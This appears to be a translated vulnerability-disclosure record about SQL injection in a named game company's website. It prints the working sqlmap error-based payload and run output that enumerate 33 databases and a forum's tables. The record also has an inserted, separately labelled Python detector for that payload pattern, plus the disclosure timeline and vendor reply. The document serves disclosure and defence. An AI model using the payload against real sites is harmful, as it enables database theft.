Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0166430

Title: 英雄互娱 SQL injection (33 databases, covering nearly all of the company's game databases, including game activation codes and more)

Vendor: 英雄互娱

Author: 天地不仁 以万物为刍狗

Submitted: 2015-12-31 15:58

Fixed: 2016-02-12 18:49

Published: 2016-02-12 18:49

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-12-31: Details sent to the vendor; awaiting vendor response
2016-01-04: Vendor confirmed; details disclosed to the vendor only
2016-01-14: Details disclosed to core white hats and relevant domain experts
2016-01-24: Details disclosed to regular white hats
2016-02-03: Details disclosed to intern white hats
2016-02-12: Details disclosed to the public

Brief description:

233333333

Detailed description:

http://ttx5.yingxiong.com/m/list.html?cid=*
The cid parameter is injectable.

[screenshot: 0.png]

[screenshot: 1.png]

The databases cover nearly all of the company's games.
BBS database:

[screenshot: 7.png]

[screenshot: 2.png]

全民枪战 (game database):

[screenshot: 3.png]

迷你刀塔 (game database):

[screenshot: 4.png]

[screenshot: 5.png]

club database:

[screenshot: 6.png]

[screenshot: 8.png]

The rest are not listed one by one.

Proof of vulnerability:

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 2031 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: http://ttx5.yingxiong.com:80/m/list.html?cid=-7296) OR 1 GROUP BY CONCAT(0x716b767171,(SELECT (CASE WHEN (6156=6156) THEN 1 ELSE 0 END)),0x7162706b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#
---
[15:24:48] [INFO] testing MySQL
[15:24:49] [INFO] confirming MySQL
[15:24:49] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[15:24:49] [INFO] fetching database names
[15:24:49] [INFO] the SQL query used returns 33 entries
[15:24:49] [INFO] starting 10 threads
[15:24:50] [INFO] retrieved: information_schema
[15:24:50] [INFO] retrieved: cayx
[15:24:50] [INFO] retrieved: cayxcms
[15:24:50] [INFO] retrieved: dgl_zykj
[15:24:50] [INFO] retrieved: club
[15:24:50] [INFO] retrieved: gwlr
[15:24:50] [INFO] retrieved: game
[15:24:50] [INFO] retrieved: ccz
[15:24:50] [INFO] retrieved: gongfu
[15:24:50] [INFO] retrieved: ifsgcms
[15:24:50] [INFO] retrieved: js
[15:24:51] [INFO] retrieved: jntjcms
[15:24:51] [INFO] retrieved: mndt
[15:24:51] [INFO] retrieved: gd_zykj
[15:24:51] [INFO] retrieved: qjsn
[15:24:51] [INFO] retrieved: mysql
[15:24:51] [INFO] retrieved: bbs
[15:24:51] [INFO] retrieved: fnkjcms
[15:24:51] [INFO] retrieved: ttx5
[15:24:51] [INFO] retrieved: ttyxyx
[15:24:51] [INFO] retrieved: qtdlcms
[15:24:51] [INFO] retrieved: mxywk
[15:24:51] [INFO] retrieved: xsg
[15:24:52] [INFO] retrieved: process
[15:24:52] [INFO] retrieved: xmcms
[15:24:52] [INFO] retrieved: performance_schema
[15:24:52] [INFO] retrieved: sqbb
[15:24:52] [INFO] retrieved: yingxiong
[15:24:52] [INFO] retrieved: yxcms
[15:24:52] [INFO] retrieved: ttx5yx
[15:24:52] [INFO] retrieved: zycx
[15:24:52] [INFO] retrieved: we
[15:24:52] [INFO] retrieved: xsgcms
available databases [33]:
[*] bbs
[*] cayx
[*] cayxcms
[*] ccz
[*] club
[*] dgl_zykj
[*] fnkjcms
[*] game
[*] gd_zykj
[*] gongfu
[*] gwlr
[*] ifsgcms
[*] information_schema
[*] jntjcms
[*] js
[*] mndt
[*] mxywk
[*] mysql
[*] performance_schema
[*] process
[*] qjsn
[*] qtdlcms
[*] sqbb
[*] ttx5
[*] ttx5yx
[*] ttyxyx
[*] we
[*] xmcms
[*] xsg
[*] xsgcms
[*] yingxiong
[*] yxcms
[*] zycx
[15:24:52] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2074 times
[15:24:52] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\ttx5.yingxiong.com'
[*] shutting down at 15:24:52


BBS database:

Database: bbs
+--------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------+---------+
| pre_thread_ip_log | 881859 |
| pre_home_notification | 243062 |
| pre_forum_post | 205318 |
| pre_forum_threadpartake | 123896 |
| pre_forum_thread | 107231 |
| pre_home_pokearchive | 92029 |
| pre_ucenter_memberfields | 81304 |
| pre_ucenter_members | 81304 |
| pre_common_member_newprompt | 78831 |
| pre_forum_thread_moderate | 71770 |
| pre_common_credit_rule_log | 69218 |
| pre_forum_threadlog | 67670 |
| pre_common_member_count_archive | 63811 |
| pre_common_member_field_forum_archive | 63811 |
| pre_common_member_field_home_archive | 63811 |
| pre_common_member_profile_archive | 63811 |
| pre_common_member_status_archive | 63811 |
| pre_common_member_archive | 63803 |
| pre_common_district | 45051 |
| pre_forum_statlog | 42148 |
| pre_common_onlinetime | 26151 |
| pre_plugin_auction_message | 25162 |
| pre_forum_hotreply_member | 23994 |
| pre_forum_sofa | 20724 |
| pre_home_poke | 20387 |
| pre_common_credit_log_field | 18673 |
| pre_common_credit_log | 18561 |
| pre_fx_checkin_log | 18459 |
| pre_forum_threadmod | 17677 |
| pre_common_member_status | 17499 |
| pre_common_member_count | 17498 |
| pre_common_member_field_forum | 17498 |
| pre_common_member_field_home | 17498 |
| pre_common_member_profile | 17498 |
| pre_common_member | 17496 |
| pre_common_connect_guest | 14393 |
| pre_fx_checkin | 13377 |
| pre_plugin_auctionapply | 12873 |
| pre_connect_memberbindlog | 9414 |
| pre_forum_newthread | 9139 |
| pre_common_member_connect | 9050 |
| pre_forum_attachment | 7939 |
| pre_forum_post_moderate | 6047 |
| pre_forum_modwork | 5881 |
| pre_mobile_wsq_threadlist | 5599 |
| pre_forum_pollvoter | 5283 |
| pre_forum_polloption | 4837 |
| pre_ucenter_pm_members | 4744 |
| pre_ucenter_pm_indexes | 4603 |
| pre_common_member_crime | 3997 |
| pre_forum_attachment_unused | 2470 |
| pre_ucenter_pm_lists | 2412 |
| pre_forum_postlog | 2292 |
| pre_home_favorite | 2154 |
| pre_fx_checkin_rates | 2000 |
| pre_forum_poll | 1901 |
| pre_txz | 1886 |
| pre_common_credit_rule_log_field | 1883 |
| pre_common_word | 1755 |
| pre_forum_threadimage | 1635 |
| pre_home_friend | 1580 |
| pre_common_member_action_log | 1325 |
| pre_forum_filter_post | 1261 |
| pre_home_friend_request | 1251 |
| pre_forum_logs | 907 |
| pre_security_evilpost | 894 |
| pre_ucenter_newpm | 833 |
| pre_common_block_pic | 830 |
| pre_common_stat | 806 |
| pre_home_friendlog | 794 |
| pre_forum_postcomment | 709 |
| pre_plugin_lj_sina | 667 |
| pre_forum_attachment_4 | 642 |
| pre_forum_attachment_9 | 635 |
| pre_forum_post_tableid | 634 |
| pre_forum_attachment_8 | 568 |
| pre_forum_attachment_2 | 540 |
| pre_forum_attachment_7 | 528 |
| pre_forum_attachment_6 | 523 |
| pre_forum_attachment_5 | 519 |
| pre_ucenter_pm_messages_4 | 513 |
| pre_forum_attachment_1 | 512 |
| pre_common_stylevar | 499 |
| pre_forum_attachment_0 | 498 |
| pre_forum_attachment_3 | 490 |
| pre_ucenter_pm_messages_2 | 488 |
| pre_ucenter_pm_messages_6 | 484 |
| pre_ucenter_pm_messages_7 | 479 |
| pre_ucenter_pm_messages_0 | 467 |
| pre_forum_threadclass | 465 |
| pre_ucenter_pm_messages_5 | 459 |
| pre_ucenter_pm_messages_9 | 452 |
| pre_common_setting | 449 |
| pre_forum_rsscache | 441 |
| pre_ucenter_pm_messages_8 | 430 |
| pre_ucenter_pm_messages_3 | 416 |
| pre_ucenter_pm_messages_1 | 406 |
| pre_security_eviluser | 401 |
| pre_forum_threaddisablepos | 332 |
| pre_forum_hotreply_number | 267 |
| pre_common_syscache | 262 |
| pre_common_smiley | 195 |
| pre_common_statuser | 162 |
| pre_common_block_item | 127 |
| pre_common_block_style | 104 |
| pre_common_session | 103 |
| pre_home_follow | 97 |
| pre_common_tag | 94 |
| pre_plugin_auction | 94 |
| pre_forum_postcache | 82 |
| pre_common_admincp_perm | 79 |
| pre_ucenter_badwords | 78 |
| pre_forum_forumfield | 72 |
| pre_forum_forum | 71 |
| pre_common_pluginvar | 68 |
| pre_common_cache | 61 |
| pre_common_member_grouppm | 53 |
| pre_common_member_profile_setting | 51 |
| pre_common_nav | 51 |
| pre_forum_threadhot | 47 |
| pre_home_favorite_del | 47 |
| pre_forum_polloption_image | 46 |
| pre_forum_moderator | 45 |
| pre_forum_threadcalendar | 39 |
| pre_common_block | 38 |
| pre_common_credit_rule | 33 |
| pre_common_report | 29 |
| pre_common_regip | 28 |
| pre_forum_medallog | 28 |
| pre_ucenter_settings | 27 |
| pre_common_plugin | 24 |
| pre_forum_replycredit | 24 |
| pre_common_usergroup | 22 |
| pre_common_usergroup_field | 22 |
| pre_connect_postfeedlog | 22 |
| pre_connect_feedlog | 21 |
| pre_common_cron | 20 |
| pre_common_member_medal | 17 |
| pre_home_click | 15 |
| pre_forum_medal | 11 |
| pre_common_admincp_cmenu | 9 |
| pre_common_grouppm | 8 |
| pre_common_optimizer | 8 |
| pre_forum_warning | 8 |
| pre_common_admingroup | 7 |
| pre_common_process | 7 |
| pre_common_word_type | 6 |
| pre_forum_imagetype | 6 |
| pre_forum_onlinelist | 6 |
| pre_forum_typeoption | 6 |
| pre_common_admincp_group | 5 |
| pre_common_style | 5 |
| pre_common_template | 5 |
| pre_myrepeats | 5 |
| pre_forum_bbcode | 4 |
| pre_lev_sign | 4 |
| pre_lev_sign_user | 4 |
| pre_common_failedip | 3 |
| pre_forum_grouplevel | 3 |
| pre_forum_poststick | 3 |
| pre_forum_threadpreview | 3 |
| pre_home_follow_feed_archiver | 3 |
| pre_common_advertisement_custom | 2 |
| pre_common_diy_data | 2 |
| pre_common_plugin_cnzz_user | 2 |
| pre_common_plugin_cnzztongji | 2 |
| pre_common_template_block | 2 |
| pre_fx_checkin_con | 2 |
| pre_mobile_setting | 2 |
| pre_study_daily_attendance | 2 |
| pre_study_daily_attendance_continuous_sign | 2 |
| pre_ucenter_failedlogins | 2 |
| pre_common_admincp_session | 1 |
| pre_common_block_xml | 1 |
| pre_common_failedlogin | 1 |
| pre_common_mailqueue | 1 |
| pre_common_member_secwhite | 1 |
| pre_common_secquestion | 1 |
| pre_common_tagitem | 1 |
| pre_forum_spacecache | 1 |
| pre_forum_threadprofile | 1 |
| pre_forum_threadtype | 1 |
| pre_plugin_auction_xml | 1 |
| pre_security_failedlog | 1 |
| pre_ucenter_admins | 1 |
| pre_ucenter_applications | 1 |
| pre_ucenter_notelist | 1 |
+--------------------------------------------+---------+
[15:29:10] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 646 times
[15:29:10] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\ttx5.yingxiong.com'
[*] shutting down at 15:29:10
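The sqlmap run above left two traces a defender can key on: the error-based payload shape (GROUP BY CONCAT(..., FLOOR(RAND(0)*2)) HAVING ...) in the cid parameter, and a burst of HTTP 500 responses from one client. The following Python is an added example, not part of the report; the log lines, client addresses and threshold are constructed, and the request path /m/list.html is taken from the report.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit, parse_qs

# Constructed sample log lines (not from the report). The first request mimics
# the error-based payload shape sqlmap reported against /m/list.html?cid=.
SAMPLE_LOG = """\
203.0.113.5 - - [31/Dec/2015:15:24:48 +0800] "GET /m/list.html?cid=-7296)%20OR%201%20GROUP%20BY%20CONCAT(0x716b767171,(SELECT%20(CASE%20WHEN%20(6156=6156)%20THEN%201%20ELSE%200%20END)),0x7162706b71,FLOOR(RAND(0)*2))%20HAVING%20MIN(0)%23 HTTP/1.1" 500 1873
203.0.113.5 - - [31/Dec/2015:15:24:48 +0800] "GET /m/list.html?cid=12%27 HTTP/1.1" 500 1873
203.0.113.5 - - [31/Dec/2015:15:24:49 +0800] "GET /m/list.html?cid=12%20AND%201=2 HTTP/1.1" 500 1873
198.51.100.7 - - [31/Dec/2015:15:24:49 +0800] "GET /m/list.html?cid=12 HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Markers of the MySQL error-based technique in the report: GROUP BY over a
# CONCAT(...) containing FLOOR(RAND(0)*2) forces a duplicate-key error that leaks data.
ERROR_BASED_RE = re.compile(r"FLOOR\(RAND\(0\)\*2\)|GROUP BY CONCAT\(|HAVING MIN\(", re.I)
INT_RE = re.compile(r"^-?\d+$")  # cid is a numeric id; anything else is suspect

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _method, target, status = m.groups()
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    # parse_qs already percent-decodes once; decode again to catch double encoding
    cid = unquote_plus(query.get("cid", [""])[0])
    return {"ip": ip, "path": parts.path, "cid": cid, "status": int(status)}

def analyze(log_text, error_threshold=3):
    """Return (alerts, errors_by_ip); alerts is a list of (ip, reason) tuples."""
    alerts, errors = [], Counter()
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or rec["path"] != "/m/list.html":
            continue
        if ERROR_BASED_RE.search(rec["cid"]):
            alerts.append((rec["ip"], "error-based SQLi signature in cid"))
        elif rec["cid"] and not INT_RE.match(rec["cid"]):
            alerts.append((rec["ip"], "non-integer cid"))
        if rec["status"] == 500:
            errors[rec["ip"]] += 1
    for ip, n in errors.items():
        if n >= error_threshold:  # a 500 burst from one client mirrors the sqlmap run above
            alerts.append((ip, f"{n} HTTP 500 responses on list.html"))
    return alerts, dict(errors)
```

Run `analyze(SAMPLE_LOG)` to get the per-request alerts plus the 500-burst alert for the scanning client; the clean request from the second client produces nothing.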


Fix recommendation:

Copyright notice: when reposting, please credit 天地不仁 以万物为刍狗@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2016-01-04 17:38

Vendor reply:

It was indeed our oversight; the people responsible have been dealt with. Thank you very much!

Latest status:

None


Vulnerability comments:

Comments

  1. 2015-12-31 16:48 | mango ( Core white hat | Rank:1868 Vulnerabilities:275 | contributing a trivial bit of "effort" )

    i this domain??